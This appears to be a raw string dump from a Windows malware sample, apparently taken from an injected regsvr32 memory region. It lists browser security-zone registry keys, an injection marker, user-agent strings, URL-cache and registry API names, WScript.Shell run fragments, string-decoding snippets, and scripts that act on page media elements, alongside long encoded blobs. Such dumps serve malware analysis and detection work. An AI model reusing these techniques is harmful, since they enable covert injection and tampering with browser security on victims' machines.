mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
c:\%original file name%.exe path>path inj_ffile>inj_ffile
c:\%original file name%.exe path>path inj_ffile>inj_ffile
regsvr32.exe_1260_rwx_00080000_000C2000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
2 2*393
2 2*393
7:8?8[8`8
7:8?8[8`8
8$8(8,8084888
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom 75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb 